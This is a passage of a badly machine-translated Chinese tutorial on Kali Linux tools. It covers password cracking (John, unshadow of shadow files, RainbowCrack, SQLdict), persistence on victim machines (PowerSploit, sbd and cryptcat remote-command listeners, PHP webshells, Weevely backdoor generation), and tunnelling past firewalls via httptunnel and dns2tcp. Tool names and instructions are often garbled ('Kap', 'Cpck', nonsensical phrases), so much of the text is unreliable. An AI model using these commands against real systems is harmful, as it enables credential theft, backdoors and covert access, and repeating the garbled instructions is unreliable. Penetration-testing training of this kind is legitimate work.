-V> 是用户名和密码,同时审判

Hydra Command

如以下屏幕所示,用户名和密码是“mfadmin:msfadmin”。

Admin Password

Johnny

Johnny 是John Ripper密码快讯工具的GUI。 一般来说,它被用于软弱的密码。

开放申请——口号攻击—— j。

Johnny

在这种情况下,我们将获得Kap机器的密码,其指挥如下,并将在桌面上建立档案。

Desktop

Cpck “Open Passwd file” - OK,所有档案都将在以下屏幕上显示。

Open File

Cpck “Start Attack”。

Start Attack

袭击完成后,将左小组点击到“密码”,口号将不予回击。

Unshaded

John

john是Johnny GUI的指挥线。 开放码头,开放“john”

Unshadowing

如果密码蒙上阴影,我们需要写以下指挥——

root@kap:~# unshadow passwd shadow > unshadowed.txt 

Rainbowcrack

彩虹Crack软件裂缝通过雨布桌盘 look。 彩虹表格是储存在硬盘上的普通文档。 一般来说,彩虹表格是在线购买的,或者可以用不同的工具汇编。

开放该平台,前往申请——“口号攻击”——点击“留波克”。

RainbowCrack

镇压散装口的指挥是——

rcrack path_to_rainbow_tables -f path_to_password_hash 

SQLdict

它是一种用于服务器的定型攻击工具,非常容易和基本使用。 开放时间,开放终点站和“sqldict”。 它将提出以下意见。

Sql Dict

在“Target IP服务器”下,进入了持有KQ的服务器的IP。 在“目标账户”下,进入用户名。 然后将档案装上密码,并点击“开端”,直至其结束。

hash-identifier

它是用来确定海螺类型的工具,即它们正在使用什么。 例如,如果我有讲卫生运动,那么如果它是一条龙线或窗户,它就可以告诉我。

Hash Identifier

上述屏幕显示,它可以是MD5的散射器,它似乎是一种随地盘旋的硬质。

Kap Linux - Maintaining Access

在本章中,我们将看到加里用于维持连接和进入破碎机器的工具,即使它再次连接和脱节。

Powersploit

这是一个用于Windows机器的工具。 它安装在受害人机器上。 这一工具帮助黑客通过PowerShell与受害者机器连接。

开放,在左边打开终点站,并打造以下指挥系统,以进入权力分管——

cd /usr/share/powersploit/ 

如果是“ls” 这份清单将列出在你获得访问后你能够下载和安装受害人机器的所有权力开发工具。 其中大多数是按姓名自行解释的。

Powersploit

在受害者机器上下载这一工具的一个容易的方法是建立一个网络服务器,该服务器授权使用各种工具,便于使用以下指挥系统:

python -m SimpleHTTPServer 

Download Tool

之后,如果是:http://<Kap organ ip_address>:8000/以下是结果。

Directory Listimg

Sbd

s是一种类似于Netcat的工具。 该软件是可携带的,可以用于六氯环己烷和微软机器。 缩略语 基本上,它有助于在某个港口随时与受害人的机器连接,并远程发送指挥。

开放到终端站和“sbd -l-pport”,供服务器接受连接。

Connection Accept

在这种情况下,让我们把44号港口放在服务器将倾听的地方。

Case Port

在受害人的现场,“sbd IPofserver port”。 将建立连接,使我们能够派遣遥控指挥部。

在这种情况下,它是“当地人”,因为我们对同一机器进行了测试。

Ipofserver

最后,在服务器上,你会看到,接线已经发生,如以下屏幕所示。

Server Connection

Webshells

可通过网站浏览或浏览。 但是,大多数检测到的是抗病毒。 C99 php壳在抗病毒中广为人知。 任何共同的抗病毒都很容易被检测为一种mal。

一般来说,其主要职能是通过网络接口发送系统指挥。

>>>在终点站开放。

Webshell

如你所知,根据编程语言,他们分班:p , aspx, cfm, jsp, perl,php

如果你进入PHP的夹,你就可以看到网站的所有网址。

Folder

“简单门槛”:php 开放网页和电子版。

最终写上三重指挥。 您将具备以下屏幕显示的所有信息。

Write Command

Weevely

韦利是PHP网壳,模拟类似电话的连接。 它是网络应用后开发的工具,可以用作偷窃的后门或网吧,管理合法网站账户,甚至免费的主机。

开放,进入终点站和“全身”类型,看看其使用情况。

Weevely

为产生弹壳,“立即产生密码径流”。 如以下屏幕所示,该软件在“台站”夹上生成,文档将上载到一个网络服务器上,以便上网。

Generate Shell

在上载以下屏幕显示的网壳后,我们可以使用指挥“韦ly URL密码”与服务器连接。 你可以看到,会议已经开始。

Uploading File

http-tunnel

http-tunnel生成一条双向虚拟数据流,在吉大港山区应用方案的要求中 tunnel。 如果有此愿望,可以通过吉大港山区替代物发出这些请求。 这对限制性防火墙的使用者是有益的。 如果允许WWWWW通过吉大港警察局的代理进入,那么它就能够使用http-tunnel和电话或PP与防火墙外的计算机连接。

第一,我们应当建立一个隧道服务器,其指挥如下:

httptunnel_server –h 

然后,在客户网站类型“httptunnel_cpent-h”上,双方将开始接受连接。

dns2tcp

这再次成为一条隧道工具,有助于通过国家航天中心交通,即UDP 53港口。

开始,“dns2tcpd”>。 当你将打开文字时,就对使用作了解释。

DNSTcp

在服务器站,进入这一指挥系统,没收档案。

#cat >>.dns2tcpdrc
<&l;END psten = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

在客户所在地,进入这一指挥部。

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076 

隧道工程将从这一指挥部开始。

cryptcat

它是另一个工具,如Netcat,使TCP和UDP能够以加密方式与受害人机器连接。

a. 开办一个服务器,听取联系,类型如下:

cryptcat –l –p port –n 

cryptcat

如果有,

    页: 1

    <-p 港口号参数表

    代表不作决议

在客户所在地,连接指挥部为“密码IPofServer PortofServer”

Port of Server

Kap Linux - Reverse Engineering

在本章中,我们将了解加里尼奥斯的反向工程工具。

OllyDbg

OllyDbg是MicrosoftWindows应用软件的32级汇合器级分析仪。 强调双亲代码分析,在缺乏来源的情况下特别有用。 一般说来,它被用于打碎商业软件。

开放申请——逆向工程——ollydbg

OllyDbg

为装上EXE文档,可上黄色“Opening ridgeer”,上面插图的红广场就显示了这一点。

在装货后,你将提出以下看法,以便改变双月。

Binaries

dex2jar

这项申请有助于将APK(android)档案转换为JAR档案,以便查看来源代码。 为了使用,打开终点站并撰写d2j-dex2jar -d /file place”

在这种情况下,档案在桌面上是“舱位”。

Classes

下面一行显示,已经建立了一个联合调查组档案。

Jar File

Created File

jd-gui

JD-GUI是一种独立的图形用途,显示 Java源代码. . . . . . . /b>文档。 你们可以浏览重建的源代码。 在这种情况下,我们可以重建从dex2jar工具中提取的档案。

为发射该终端,开放并撰写“jd-gui”,以下意见将开放。

为输入档案,点击了开放的圆夹“Open。 icon在左上角,然后进口档案。

Jd Gui

apktool

Apktool是扭转整个海底应用的最佳工具之一。 它可以将资源编码到几乎一种原始形式,并在作出修改后加以重建。

开放至终点站,并写到“pktool”

To decompile a a apk file, written “apktool d apk file”

Apktool

完成工作将如以下屏幕所示开始。

Decompilation

Kap Linux - Reporting Tools

在本章中,我们将了解在加里尼奥斯的一些报告工具。

Dradis

在我们开展的所有这项工作中,重要的是分享所取得的成果,跟踪我们的工作等等。 为此,Kap拥有一个称为网络服务的报告工具。

Dradis

开放,申请————————————————————————————————————。

Reporting

The web URL will open. 任何国家均可在以下网址上开放:URL https://IPkap organ:3004

首次使用的用户名和密码。

LAN Open

Step 3——在伐木之后,你可以从NMAP、NESSUS、NEXPOSE进口档案。 为此,“从档案中进口”——点击“新进口商(有实时反馈)”。

Import Real Time

选择你想要上载的档案类型。 在本案中是“Nessus scan”——点击“Browse”。

Upload Manager

如果你现在去回家,在左边的小组上,你会看到进口的扫描器有其东道国和港口细节的夹。

Port Details

Metagoofil

梅塔戈菲尔斯在谷歌进行搜索,以查明这些文件并将其下载到当地磁盘上,然后提取元数据。 它提取属于特定公司、个人、物体等的公共文件元数据。

开放:

Metagoofil

开始搜查,类型如下:

python metagoofil.py 

你可以使用这一指挥的以下参数:

    (名)

    -t(下载狗的档案类型,pdf,etc)

    -l(结果10,100>)

    -n(下载的有限档案)

    -o(保存档案的地点)

    <-f>> (产出档案)

下面的例子只表明域名是隐蔽的。

Hidden Domain Name
Advertisements